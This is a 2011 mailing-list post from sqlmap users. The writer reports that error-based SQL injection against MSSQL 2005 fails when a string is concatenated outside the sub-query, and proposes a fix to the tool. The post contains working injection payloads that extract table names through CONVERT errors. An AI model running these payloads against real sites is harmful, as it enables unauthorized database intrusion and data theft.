[sqlmap-users] Concating sub-queries with strings
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Concating sub-queries with strings
|
From: execute <ex...@gm...> - 2011-05-07 17:46:26
|
Hey,
I'm using the error-based technique for extracting data from an MSSQL server
(2005 - 9.00.4053.00). It seems like concating the sub-query with a string
doesn't work well - for some reason, the webserver returns the regular
response for row not found instead of throwing an error.
I tested it manually and found the following:
- ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype
= 'U')) -- - Works well - throws an error with a table name ("Conversion
failed when converting the nvarchar value 'TABLE-NAME' to data type int.
")
- ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE
xtype = 'U')) -- - Works well - throws an error with a table name
("Conversion
failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.
")
- ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE
xtype = 'U')) -- - Doesn't work - just returns 'page not found' (not an
404 error, an error from the script telling that no rows were found)
Can anyone test and confirm this? I'm not quite sure why that happens, but
it seems like it can easily be fixed by adding the strings inside the
sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
now.
Thanks
|
